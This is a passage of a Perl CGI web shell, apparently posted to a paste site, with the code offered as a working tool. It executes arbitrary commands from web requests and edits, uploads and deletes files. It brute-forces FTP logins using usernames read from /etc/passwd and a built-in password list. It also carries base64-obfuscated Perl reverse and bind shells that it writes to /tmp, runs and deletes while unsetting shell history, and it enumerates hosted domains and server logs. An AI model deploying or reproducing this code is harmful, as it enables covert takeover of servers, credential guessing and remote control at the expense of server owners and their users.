  849.         $result .= &RunCmd;
  850.     }elsif($RunCommand =~ m/^\s*edit\s+(.+)/)
  851.     {
  852.         $result .=  &SaveFileForm;
  853.     }else
  854.     {
  855.         $result .= &PrintCommandLineInputForm;
  856.         $result .= "Command: <run>$RunCommand</run><br><textarea id='data' cols='$cols' rows='$rows' spellcheck='false'>";
  857.         $result .=&RunCmd;
  858.     }
  859.     $result .=  "</textarea>";
  860.     return $result;
  861. }
  862.  
  863. #------------------------------------------------------------------------
  864. # run command
  865. #------------------------------------------------------------------------
  866.  
  867. sub RunCmd
  868. {
  869.     my $result="";
  870.     $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
  871.     if(!$WinNT)
  872.     {
  873.         $SIG{'ALRM'} = \&CommandTimeout;
  874.         alarm($CommandTimeoutDuration);
  875.     }
  876.     if($ShowDynamicOutput) # show output as it is generated
  877.     {
  878.         $|=1;
  879.         $Command .= " |";
  880.         open(CommandOutput, $Command);
  881.         while(<CommandOutput>)
  882.         {
  883.             $_ =~ s/(\n|\r\n)$//;
  884.             $result .= &HtmlSpecialChars("$_\n");
  885.         }
  886.         $|=0;
  887.     }
  888.     else # show output after command completes
  889.     {
  890.         $result .= &HtmlSpecialChars('$Command');
  891.     }
  892.     if(!$WinNT)
  893.     {
  894.         alarm(0);
  895.     }
  896.     return $result;
  897. }
  898. #==============================================================================
  899. # Form Save File
  900. #==============================================================================
  901. sub SaveFileForm
  902. {
  903.     my $result ="";
  904.     substr($RunCommand,0,5)="";
  905.     my $file=&trim($RunCommand);
  906.     $save='<br><input name="a" type="submit" value="save" class="submit" >';
  907.     $File=$CurrentDir.$PathSep.$RunCommand;
  908.     my $dir="<span style='font: 11pt Verdana; font-weight: bold;'>".&AddLinkDir("gui")."</span>";
  909.     if(-w $File)
  910.     {
  911.         $rows="23"
  912.     }else
  913.     {
  914.         $msg="<br><font style='font: 15pt Verdana; color: yellow;' > Permission denied!<font><br>";
  915.         $rows="20"
  916.     }
  917.     $Prompt = $WinNT ? "$dir > " : "<font color='#FFFFFF'>[admin\@$ServerName $dir]\$</font> ";
  918.     $read=($WinNT)?"type":"less";
  919.     $RunCommand = "$read \"$RunCommand\"";
  920.     $result .=  <<END;
  921.     <form name="f" method="POST" action="$ScriptLocation">
  922.  
  923.     <input type="hidden" name="d" value="$CurrentDir">
  924.     $Prompt
  925.     <input type="text" size="40" name="c">
  926.     <input name="s" class="submit" type="submit" value="Enter">
  927.     <br>Command: <run> $RunCommand </run>
  928.     <input type="hidden" name="file" value="$file" > $save <br> $msg
  929.     <br><textarea id="data" name="data" cols="$cols" rows="$rows" spellcheck="false">
  930. END
  931.    
  932.     $result .= &RunCmd;
  933.     $result .=  "</textarea>";
  934.     $result .=  "</form>";
  935.     return $result;
  936. }
  937. #==============================================================================
  938. # Save File
  939. #==============================================================================
  940. sub SaveFile($)
  941. {
  942.     my $Data= shift ;
  943.     my $File= shift;
  944.     $File=$CurrentDir.$PathSep.$File;
  945.     if(open(FILE, ">$File"))
  946.     {
  947.         binmode FILE;
  948.         print FILE $Data;
  949.         close FILE;
  950.         return 1;
  951.     }else
  952.     {
  953.         return 0;
  954.     }
  955. }
  956. #------------------------------------------------------------------------------
  957. # Brute Forcer Form
  958. #------------------------------------------------------------------------------
  959. sub BruteForcerForm
  960. {
  961.     my $result="";
  962.     $result .= <<END;
  963.  
  964. <table>
  965.  
  966. <tr>
  967. <td colspan="2" align="center">
  968. ####################################<br>
  969. Simple FTP brute forcer<br>
  970. ####################################
  971. <form name="f" method="POST" action="$ScriptLocation">
  972.  
  973. <input type="hidden" name="a" value="bruteforcer"/>
  974. </td>
  975. </tr>
  976. <tr>
  977. <td>User:<br><textarea rows="18" cols="30" name="user">
  978. END
  979. chop($result .= `less /etc/passwd | cut -d: -f1`);
  980. $result .= <<'END';
  981. </textarea></td>
  982. <td>
  983.  
  984. Pass:<br>
  985. <textarea rows="18" cols="30" name="pass">123pass
  986. 123!@#
  987. 123admin
  988. 123abc
  989. 123456admin
  990. 1234554321
  991. 12344321
  992. pass123
  993. admin
  994. admincp
  995. administrator
  996. matkhau
  997. passadmin
  998. p@ssword
  999. p@ssw0rd
  1000. password
  1001. 123456
  1002. 1234567
  1003. 12345678
  1004. 123456789
  1005. 1234567890
  1006. 111111
  1007. 000000
  1008. 222222
  1009. 333333
  1010. 444444
  1011. 555555
  1012. 666666
  1013. 777777
  1014. 888888
  1015. 999999
  1016. 123123
  1017. 234234
  1018. 345345
  1019. 456456
  1020. 567567
  1021. 678678
  1022. 789789
  1023. 123321
  1024. 456654
  1025. 654321
  1026. 7654321
  1027. 87654321
  1028. 987654321
  1029. 0987654321
  1030. admin123
  1031. admin123456
  1032. abcdef
  1033. abcabc
  1034. !@#!@#
  1035. !@#$%^
  1036. !@#$%^&*(
  1037. !@#$$#@!
  1038. abc123
  1039. anhyeuem
  1040. iloveyou</textarea>
  1041. </td>
  1042. </tr>
  1043. <tr>
  1044. <td colspan="2" align="center">
  1045. Sleep:<select name="sleep">
  1046.  
  1047. <option>0</option>
  1048. <option>1</option>
  1049. <option>2</option>
  1050.  
  1051. <option>3</option>
  1052. </select>
  1053. <input type="submit" class="submit" value="Brute Forcer"/></td></tr>
  1054. </form>
  1055. </table>
  1056. END
  1057. return $result;
  1058. }
  1059. #------------------------------------------------------------------------------
  1060. # Brute Forcer
  1061. #------------------------------------------------------------------------------
  1062. sub BruteForcer
  1063. {
  1064.     my $result="";
  1065.     $Server=$ENV{'SERVER_ADDR'};
  1066.     if($in{'user'} eq "")
  1067.     {
  1068.         $result .= &BruteForcerForm;
  1069.     }else
  1070.     {
  1071.         use Net::FTP;
  1072.         @user= split(/\n/, $in{'user'});
  1073.         @pass= split(/\n/, $in{'pass'});
  1074.         chomp(@user);
  1075.         chomp(@pass);
  1076.         $result .= "<br><br>[+] Trying brute $ServerName<br>====================>>>>>>>>>>>><<<<<<<<<<====================<br><br>\n";
  1077.         foreach $username (@user)
  1078.         {
  1079.             if(!($username eq ""))
  1080.             {
  1081.                 foreach $password (@pass)
  1082.                 {
  1083.                     $ftp = Net::FTP->new($Server) or die "Could not connect to $ServerName\n";
  1084.                     if($ftp->login("$username","$password"))
  1085.                     {
  1086.                         $result .= "<a target='_blank' href='ftp://$username:$password\@$Server'>[+] ftp://$username:$password\@$Server</a><br>\n";
  1087.                         $ftp->quit();
  1088.                         break;
  1089.                     }
  1090.                     if(!($in{'sleep'} eq "0"))
  1091.                     {
  1092.                         sleep(int($in{'sleep'}));
  1093.                     }
  1094.                     $ftp->quit();
  1095.                 }
  1096.             }
  1097.         }
  1098.         $result .= "\n<br>==========>>>>>>>>>> Finished <<<<<<<<<<==========<br>\n";
  1099.     }
  1100.     return $result;
  1101. }
  1102. #------------------------------------------------------------------------------
  1103. # Backconnect Form
  1104. #------------------------------------------------------------------------------
  1105. sub BackBindForm
  1106. {
  1107.     return <<END;
  1108.     <br><br>
  1109.  
  1110.     <table>
  1111.     <tr>
  1112.     <form name="f" method="POST" action="$ScriptLocation">
  1113.     <td>BackConnect: <input type="hidden" name="a" value="backbind"></td>
  1114.     <td> Host: <input type="text" size="20" name="clientaddr" value="$ENV{'REMOTE_ADDR'}">
  1115.      Port: <input type="text" size="7" name="clientport" value="80" onkeyup="document.getElementById('ba').innerHTML=this.value;"></td>
  1116.  
  1117.     <td><input name="s" class="submit" type="submit" name="submit" value="Connect"></td>
  1118.     </form>
  1119.     </tr>
  1120.     <tr>
  1121.     <td colspan=3><font color=#FFFFFF>[+] Client listen before connect back!
  1122.     <br>[+] Try check your Port with <a target="_blank" href="http://www.canyouseeme.org/">http://www.canyouseeme.org/</a>
  1123.     <br>[+] Client listen with command: <run>nc -vv -l -p <span id="ba">80</span></run></font></td>
  1124.  
  1125.     </tr>
  1126.     </table>
  1127.  
  1128.     <br><br>
  1129.     <table>
  1130.     <tr>
  1131.     <form method="POST" action="$ScriptLocation">
  1132.     <td>Bind Port: <input type="hidden" name="a" value="backbind"></td>
  1133.  
  1134.     <td> Port: <input type="text" size="15" name="clientport" value="1412" onkeyup="document.getElementById('bi').innerHTML=this.value;">
  1135.  
  1136.      Password: <input type="text" size="15" name="bindpass" value="THIEUGIABUON"></td>
  1137.     <td><input name="s" class="submit" type="submit" name="submit" value="Bind"></td>
  1138.     </form>
  1139.     </tr>
  1140.     <tr>
  1141.     <td colspan=3><font color=#FFFFFF>[+] Chuc nang chua dc test!
  1142.     <br>[+] Try command: <run>nc $ENV{'SERVER_ADDR'} <span id="bi">1412</span></run></font></td>
  1143.  
  1144.     </tr>
  1145.     </table><br>
  1146. END
  1147. }
  1148. #------------------------------------------------------------------------------
  1149. # Backconnect use perl
  1150. #------------------------------------------------------------------------------
  1151. sub BackBind
  1152. {
  1153.     use MIME::Base64;
  1154.     use Socket;
  1155.     $backperl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCiRTaGVsbAk9ICIvYmluL2Jhc2giOw0KJEFSR0M9QEFSR1Y7DQp1c2UgU29ja2V0Ow0KdXNlIEZpbGVIYW5kbGU7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgZ2V0cHJvdG9ieW5hbWUoInRjcCIpKSBvciBkaWUgcHJpbnQgIlstXSBVbmFibGUgdG8gUmVzb2x2ZSBIb3N0XG4iOw0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdFxuIjsNCnByaW50ICJDb25uZWN0ZWQhIjsNClNPQ0tFVC0+YXV0b2ZsdXNoKCk7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsIj4mU09DS0VUIik7DQpwcmludCAiLS09PSBDb25uZWN0ZWQgQmFja2Rvb3IgPT0tLSAgXG5cbiI7DQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVCA7ZWNobyAnWytdIFN5c3RlbWluZm86ICc7IHVuYW1lIC1hO2VjaG87ZWNobyAnWytdIFVzZXJpbmZvOiAnOyBpZDtlY2hvO2VjaG8gJ1srXSBEaXJlY3Rvcnk6ICc7IHB3ZDtlY2hvOyBlY2hvICdbK10gU2hlbGw6ICc7JFNoZWxsIik7DQpjbG9zZSBTT0NLRVQ7";
  1156.     $bindperl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJEFSR0M9QEFSR1Y7DQokcG9ydAk9ICRBUkdWWzBdOw0KJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0KJFNoZWxsCT0gIi9iaW4vYmFzaCI7DQpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKW9yIGRpZSAic29ja2V0OiQhIjsNCnNldHNvY2tvcHQoU0VSVkVSLCBTT0xfU09DS0VULCBTT19SRVVTRUFERFIsIHBhY2soImwiLCAxKSlvciBkaWUgInNldHNvY2tvcHQ6ICQhIjsNCmJpbmQoU0VSVkVSLCBzb2NrYWRkcl9pbigkcG9ydCwgSU5BRERSX0FOWSkpb3IgZGllICJiaW5kOiAkISI7DQpsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pCQlvciBkaWUgImxpc3RlbjogJCEiOw0KZm9yKDsgJHBhZGRyID0gYWNjZXB0KENMSUVOVCwgU0VSVkVSKTsgY2xvc2UgQ0xJRU5UKQ0Kew0KCW9wZW4oU1RESU4sICI+JkNMSUVOVCIpOw0KCW9wZW4oU1RET1VULCAiPiZDTElFTlQiKTsNCglvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7DQoJc3lzdGVtKCJ1bnNldCBISVNURklMRTsgdW5zZXQgU0FWRUhJU1QgO2VjaG8gJ1srXSBTeXN0ZW1pbmZvOiAnOyB1bmFtZSAtYTtlY2hvO2VjaG8gJ1srXSBVc2VyaW5mbzogJzsgaWQ7ZWNobztlY2hvICdbK10gRGlyZWN0b3J5OiAnOyBwd2Q7ZWNobzsgZWNobyAnWytdIFNoZWxsOiAnOyRTaGVsbCIpOw0KCWNsb3NlKFNURElOKTsNCgljbG9zZShTVERPVVQpOw0KCWNsb3NlKFNUREVSUik7DQp9DQo=";
  1157.  
  1158.     $ClientAddr = $in{'clientaddr'};
  1159.     $ClientPort = int($in{'clientport'});
  1160.     if($ClientPort eq 0)
  1161.     {
  1162.         return &BackBindForm;
  1163.     }elsif(!$ClientAddr eq "")
  1164.     {
  1165.         $Data=decode_base64($backperl);
  1166.         if(-w "/tmp/")
  1167.         {
  1168.             $File="/tmp/backconnect.pl";   
  1169.         }else
  1170.         {
  1171.             $File=$CurrentDir.$PathSep."backconnect.pl";
  1172.         }
  1173.         open(FILE, ">$File");
  1174.         print FILE $Data;
  1175.         close FILE;
  1176.         system("perl backconnect.pl $ClientAddr $ClientPort");
  1177.         unlink($File);
  1178.         exit 0;
  1179.     }else
  1180.     {
  1181.         $Data=decode_base64($bindperl);
  1182.         if(-w "/tmp")
  1183.         {
  1184.             $File="/tmp/bindport.pl";  
  1185.         }else
  1186.         {
  1187.             $File=$CurrentDir.$PathSep."bindport.pl";
  1188.         }
  1189.         open(FILE, ">$File");
  1190.         print FILE $Data;
  1191.         close FILE;
  1192.         system("perl bindport.pl $ClientPort");
  1193.         unlink($File);
  1194.         exit 0;
  1195.     }
  1196. }
  1197. #------------------------------------------------------------------------------
  1198. #  Array List Directory
  1199. #------------------------------------------------------------------------------
  1200. sub RmDir($)
  1201. {
  1202.     my $dir = shift;
  1203.     if(opendir(DIR,$dir))
  1204.     {
  1205.         while($file = readdir(DIR))
  1206.         {
  1207.             if(($file ne ".") && ($file ne ".."))
  1208.             {
  1209.                 $file= $dir.$PathSep.$file;
  1210.                 if(-d $file)
  1211.                 {
  1212.                     &RmDir($file);
  1213.                 }
  1214.                 else
  1215.                 {
  1216.                     unlink($file);
  1217.                 }
  1218.             }
  1219.         }
  1220.         closedir(DIR);
  1221.     }
  1222.     if(!rmdir($dir))
  1223.     {
  1224.        
  1225.     }
  1226. }
  1227. sub FileOwner($)
  1228. {
  1229.     my $file = shift;
  1230.     if(-e $file)
  1231.     {
  1232.         ($uid,$gid) = (stat($file))[4,5];
  1233.         if($WinNT)
  1234.         {
  1235.             return "???";
  1236.         }
  1237.         else
  1238.         {
  1239.             $name=getpwuid($uid);
  1240.             $group=getgrgid($gid);
  1241.             return $name."/".$group;
  1242.         }
  1243.     }
  1244.     return "???";
  1245. }
  1246. sub ParentFolder($)
  1247. {
  1248.     my $path = shift;
  1249.     my $Comm = "cd \"$CurrentDir\"".$CmdSep."cd ..".$CmdSep.$CmdPwd;
  1250.     chop($path = `$Comm`);
  1251.     return $path;
  1252. }
  1253. sub FilePerms($)
  1254. {
  1255.     my $file = shift;
  1256.     my $ur = "-";
  1257.     my $uw = "-";
  1258.     if(-e $file)
  1259.     {
  1260.         if($WinNT)
  1261.         {
  1262.             if(-r $file){ $ur = "r"; }
  1263.             if(-w $file){ $uw = "w"; }
  1264.             return $ur . " / " . $uw;
  1265.         }else
  1266.         {
  1267.             $mode=(stat($file))[2];
  1268.             $result = sprintf("%04o", $mode & 07777);
  1269.             return $result;
  1270.         }
  1271.     }
  1272.     return "0000";
  1273. }
  1274. sub FileLastModified($)
  1275. {
  1276.     my $file = shift;
  1277.     if(-e $file)
  1278.     {
  1279.         ($la) = (stat($file))[9];
  1280.         ($d,$m,$y,$h,$i) = (localtime($la))[3,4,5,2,1];
  1281.         $y = $y + 1900;
  1282.         @month = qw/1 2 3 4 5 6 7 8 9 10 11 12/;
  1283.         $lmtime = sprintf("%02d/%s/%4d %02d:%02d",$d,$month[$m],$y,$h,$i);
  1284.         return $lmtime;
  1285.     }
  1286.     return "???";
  1287. }
  1288. sub FileSize($)
  1289. {
  1290.     my $file = shift;
  1291.     if(-f $file)
  1292.     {
  1293.         return -s $file;
  1294.     }
  1295.     return "0";
  1296.  
  1297. }
  1298. sub ParseFileSize($)
  1299. {
  1300.     my $size = shift;
  1301.     if($size <= 1024)
  1302.     {
  1303.         return $size. " B";
  1304.     }
  1305.     else
  1306.     {
  1307.         if($size <= 1024*1024)
  1308.         {
  1309.             $size = sprintf("%.02f",$size / 1024);
  1310.             return $size." KB";
  1311.         }
  1312.         else
  1313.         {
  1314.             $size = sprintf("%.2f",$size / 1024 / 1024);
  1315.             return $size." MB";
  1316.         }
  1317.     }
  1318. }
  1319. sub trim($)
  1320. {
  1321.     my $string = shift;
  1322.     $string =~ s/^\s+//;
  1323.     $string =~ s/\s+$//;
  1324.     return $string;
  1325. }
  1326. sub AddSlashes($)
  1327. {
  1328.     my $string = shift;
  1329.     $string=~ s/\\/\\\\/g;
  1330.     return $string;
  1331. }
  1332. sub ListDir
  1333. {
  1334.     my $path = $CurrentDir.$PathSep;
  1335.     $path=~ s/\\\\/\\/g;
  1336.     my $result = "<form name='f' action='$ScriptLocation'><span style='font: 11pt Verdana; font-weight: bold;'>Path: [ ".&AddLinkDir("gui")." ] </span><input type='text' name='d' size='40' value='$CurrentDir' /><input type='hidden' name='a' value='gui'><input class='submit' type='submit' value='Change'></form>";
  1337.     if(-d $path)
  1338.     {
  1339.         my @fname = ();
  1340.         my @dname = ();
  1341.         if(opendir(DIR,$path))
  1342.         {
  1343.             while($file = readdir(DIR))
  1344.             {
  1345.                 $f=$path.$file;
  1346.                 if(-d $f)
  1347.                 {
  1348.                     push(@dname,$file);
  1349.                 }
  1350.                 else
  1351.                 {
  1352.                     push(@fname,$file);
  1353.                 }
  1354.             }
  1355.             closedir(DIR);
  1356.         }
  1357.         @fname = sort { lc($a) cmp lc($b) } @fname;
  1358.         @dname = sort { lc($a) cmp lc($b) } @dname;
  1359.         $result .= "<div><table width='90%' class='listdir'>
  1360.  
  1361.         <tr style='background-color: #3e3e3e'><th>File Name</th>
  1362.         <th style='width:100px;'>File Size</th>
  1363.         <th style='width:150px;'>Owner</th>
  1364.         <th style='width:100px;'>Permission</th>
  1365.         <th style='width:150px;'>Last Modified</th>
  1366.         <th style='width:260px;'>Action</th></tr>";
  1367.         my $style="line";
  1368.         my $i=0;
  1369.         foreach my $d (@dname)
  1370.         {
  1371.             $style= ($style eq "line") ? "notline": "line";
  1372.             $d = &trim($d);
  1373.             $dirname=$d;
  1374.             if($d eq "..")
  1375.             {
  1376.                 $d = &ParentFolder($path);
  1377.             }
  1378.             elsif($d eq ".")
  1379.             {
  1380.                 $d = $path;
  1381.             }
  1382.             else
  1383.             {
  1384.                 $d = $path.$d;
  1385.             }
  1386.             $result .= "<tr class='$style'>
  1387.  
  1388.             <td id='File_$i' style='font: 11pt Verdana; font-weight: bold;'><a  href='?a=gui&d=".$d."'>[ ".$dirname." ]</a></td>";
  1389.             $result .= "<td>DIR</td>";
  1390.             $result .= "<td style='text-align:center;'>".&FileOwner($d)."</td>";
  1391.             $result .= "<td id='FilePerms_$i' style='text-align:center;' ondblclick=\"rm_chmod_form(this,".$i.",'".&FilePerms($d)."','".$dirname."')\" ><span onclick=\"chmod_form(".$i.",'".$dirname."')\" >".&FilePerms($d)."</span></td>";
  1392.             $result .= "<td style='text-align:center;'>".&FileLastModified($d)."</td>";
  1393.             $result .= "<td style='text-align:center;'><a href='javascript:return false;' onclick=\"rename_form($i,'$dirname','".&AddSlashes(&AddSlashes($d))."')\">Rename</a>  | <a onclick=\"if(!confirm('Remove dir: $dirname ?')) { return false;}\" href='?a=gui&d=$path&remove=$dirname'>Remove</a></td>";
  1394.             $result .= "</tr>";
  1395.             $i++;
  1396.         }
  1397.         foreach my $f (@fname)
  1398.         {
  1399.             $style= ($style eq "line") ? "notline": "line";
  1400.             $file=$f;
  1401.             $f = $path.$f;
  1402.             $view = "?dir=".$path."&view=".$f;
  1403.             $result .= "<tr class='$style'><td id='File_$i' style='font: 11pt Verdana;'><a href='?a=command&d=".$path."&c=edit%20".$file."'>".$file."</a></td>";
  1404.             $result .= "<td>".&ParseFileSize(&FileSize($f))."</td>";
  1405.             $result .= "<td style='text-align:center;'>".&FileOwner($f)."</td>";
  1406.             $result .= "<td id='FilePerms_$i' style='text-align:center;' ondblclick=\"rm_chmod_form(this,".$i.",'".&FilePerms($f)."','".$file."')\" ><span onclick=\"chmod_form($i,'$file')\" >".&FilePerms($f)."</span></td>";
  1407.             $result .= "<td style='text-align:center;'>".&FileLastModified($f)."</td>";
  1408.             $result .= "<td style='text-align:center;'><a href='?a=command&d=".$path."&c=edit%20".$file."'>Edit</a> | <a href='javascript:return false;' onclick=\"rename_form($i,'$file','f')\">Rename</a> | <a href='?a=download&o=go&f=".$f."'>Download</a> | <a onclick=\"if(!confirm('Remove file: $file ?')) { return false;}\" href='?a=gui&d=$path&remove=$file'>Remove</a></td>";
  1409.             $result .= "</tr>";
  1410.             $i++;
  1411.         }
  1412.         $result .= "</table></div>";
  1413.     }
  1414.     return $result;
  1415. }
  1416. #------------------------------------------------------------------------------
  1417. # Try to View List User
  1418. #------------------------------------------------------------------------------
  1419. sub ViewDomainUser
  1420. {
  1421.     open (domains, '/etc/named.conf') or $err=1;
  1422.     my @cnzs = <domains>;
  1423.     close d0mains;
  1424.     my $style="line";
  1425.     my $result="<h5><font style='font: 15pt Verdana;color: #ff9900;'>Hoang Sa - Truong Sa</font></h5>";
  1426.     if ($err)
  1427.     {
  1428.         $result .=  ('<p>C0uldn\'t Bypass it , Sorry</p>');
  1429.         return $result;
  1430.     }else
  1431.     {
  1432.         $result .= '<table><tr><th>Domains</th> <th>User</th></tr>';
  1433.     }
  1434.     foreach my $one (@cnzs)
  1435.     {
  1436.         if($one =~ m/.*?zone "(.*?)" {/)
  1437.         {  
  1438.             $style= ($style eq "line") ? "notline": "line";
  1439.             $filename= "/etc/valiases/".$one;
  1440.             $owner = getpwuid((stat($filename))[4]);
  1441.             $result .= '<tr class="$style" width=50%><td>'.$one.' </td><td> '.$owner.'</td></tr>';
  1442.         }
  1443.     }
  1444.     $result .= '</table>';
  1445.     return $result;
  1446. }
  1447. #------------------------------------------------------------------------------
  1448. # View Log
  1449. #------------------------------------------------------------------------------
  1450. sub ViewLog
  1451. {
  1452.     if($WinNT)
  1453.     {
  1454.         return "<h2><font style='font: 20pt Verdana;color: #ff9900;'>Don't run on Windows</font></h2>";
  1455.     }
  1456.     my $result="<table><tr><th>Path Log</th><th>Submit</th></tr>";
  1457.     my @pathlog=(
  1458.                 '/usr/local/apache/logs/error_log',
  1459.                 '/var/log/httpd/error_log',
  1460.                 '/usr/local/apache/logs/access_log'
  1461.                 );
  1462.     my $i=0;
  1463.     my $perms;
  1464.     my $sl;
  1465.     foreach my $log (@pathlog)
  1466.     {
  1467.         if(-w $log)
  1468.         {
  1469.             $perms="OK";
  1470.         }else
  1471.         {
  1472.             chop($sl = `ln -s $log error_log_$i`);
  1473.             if(&trim($ls) eq "")
  1474.             {
  1475.                 if(-r $ls)
  1476.                 {
  1477.                     $perms="OK";
  1478.                     $log="error_log_".$i;
  1479.                 }
  1480.             }else
  1481.             {
  1482.                 $perms="<font style='color: red;'>Cancel<font>";
  1483.             }
  1484.         }
  1485.         $result .=<<END;
  1486.         <tr>
  1487.  
  1488.             <form action="" method="post">
  1489.             <td><input type="text" onkeyup="document.getElementById('log_$i').value='less ' + this.value;" value="$log" size='50'/></td>
  1490.             <td><input class="submit" type="submit" value="Try" /></td>
  1491.             <input type="hidden" id="log_$i" name="c" value="less $log"/>
  1492.             <input type="hidden" name="a" value="command" />
  1493.             <input type="hidden" name="d" value="$CurrentDir" />
  1494.             </form>
  1495.             <td>$perms</td>
  1496.  
  1497.         </tr>
  1498. END
  1499.         $i++;
  1500.     }
  1501.     $result .="</table>";
  1502.     return $result;
  1503. }
  1504. #------------------------------------------------------------------------------
  1505. # Main Program - Execution Starts Here
  1506. #------------------------------------------------------------------------------
  1507. &ReadParse;
  1508. &GetCookies;
  1509.  
  1510. $ScriptLocation = $ENV{'SCRIPT_NAME'};
  1511. $ServerName = $ENV{'SERVER_NAME'};
  1512. $LoginPassword = $in{'p'};
  1513. $RunCommand = $in{'c'};
  1514. $TransferFile = $in{'f'};
  1515. $Options = $in{'o'};
  1516. $Action = $in{'a'};
  1517.  
  1518. $Action = "command" if($Action eq ""); # no action specified, use default
  1519.  
  1520. # get the directory in which the commands will be executed
  1521. $CurrentDir = &trim($in{'d'});
  1522. # mac dinh xuat thong tin neu ko co lenh nao!
  1523. $RunCommand= $WinNT?"dir":"dir -lia" if($RunCommand eq "");
  1524. chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
  1525.  
  1526. $LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
  1527.  
  1528. if($Action eq "login" || !$LoggedIn)        # user needs/has to login
  1529. {
  1530.     &PerformLogin;
  1531. }elsif($Action eq "gui") # GUI directory
  1532. {
  1533.     &PrintPageHeader;
  1534.     if(!$WinNT)
  1535.     {
  1536.         $chmod=int($in{'chmod'});
  1537.         if(!($chmod eq 0))
  1538.         {
  1539.             $chmod=int($in{'chmod'});
  1540.             $file=$CurrentDir.$PathSep.$TransferFile;
  1541.             chop($result= `chmod $chmod "$file"`);
  1542.             if(&trim($result) eq "")
  1543.             {
  1544.                 print "<run> Done! </run><br>";
  1545.             }else
  1546.             {
  1547.                 print "<run> Sorry! You dont have permissions! </run><br>";
  1548.             }
  1549.         }
  1550.     }
  1551.     $rename=$in{'rename'};
  1552.     if(!$rename eq "")
  1553.     {
  1554.         if(rename($TransferFile,$rename))
  1555.         {
  1556.             print "<run> Done! </run><br>";
  1557.         }else
  1558.         {
  1559.             print "<run> Sorry! You dont have permissions! </run><br>";
  1560.         }
  1561.     }
  1562.     $remove=$in{'remove'};
  1563.     if($remove ne "")
  1564.     {
  1565.         $rm = $CurrentDir.$PathSep.$remove;
  1566.         if(-d $rm)
  1567.         {
  1568.             &RmDir($rm);
  1569.         }else
  1570.         {
  1571.             if(unlink($rm))
  1572.             {
  1573.                 print "<run> Done! </run><br>";
  1574.             }else
  1575.             {
  1576.                 print "<run> Sorry! You dont have permissions! </run><br>";
  1577.             }          
  1578.         }
  1579.     }
  1580.     print &ListDir;
  1581.  
  1582. }
  1583. elsif($Action eq "command")                 # user wants to run a command
  1584. {
  1585.     &PrintPageHeader("c");
  1586.     print &ExecuteCommand;
  1587. }
  1588. elsif($Action eq "save")                    # user wants to save a file
  1589. {
  1590.     &PrintPageHeader;
  1591.     if(&SaveFile($in{'data'},$in{'file'}))
  1592.     {
  1593.         print "<run> Done! </run><br>";
  1594.     }else
  1595.     {
  1596.         print "<run> Sorry! You dont have permissions! </run><br>";
  1597.     }
  1598.     print &ListDir;
  1599. }
  1600. elsif($Action eq "upload")                  # user wants to upload a file
  1601. {
  1602.     &PrintPageHeader;
  1603.  
  1604.     print &UploadFile;
  1605. }
  1606. elsif($Action eq "backbind")                # user wants to back connect or bind port
  1607. {
  1608.     &PrintPageHeader("clientport");
  1609.     print &BackBind;
  1610. }
  1611. elsif($Action eq "bruteforcer")             # user wants to brute force
  1612. {
  1613.     &PrintPageHeader;
  1614.     print &BruteForcer;
  1615. }elsif($Action eq "download")               # user wants to download a file
  1616. {
  1617.     print &DownloadFile;
  1618. }elsif($Action eq "checklog")               # user wants to view log file
  1619. {
  1620.     &PrintPageHeader;
  1621.     print &ViewLog;
  1622.  
  1623. }elsif($Action eq "domainsuser")            # user wants to view list user/domain
  1624. {
  1625.     &PrintPageHeader;
  1626.     print &ViewDomainUser;
  1627. }elsif($Action eq "logout")                 # user wants to logout
  1628. {
  1629.     &PerformLogout;
  1630. }
  1631. &PrintPageFooter;
Add Comment
Please, Sign In to add comment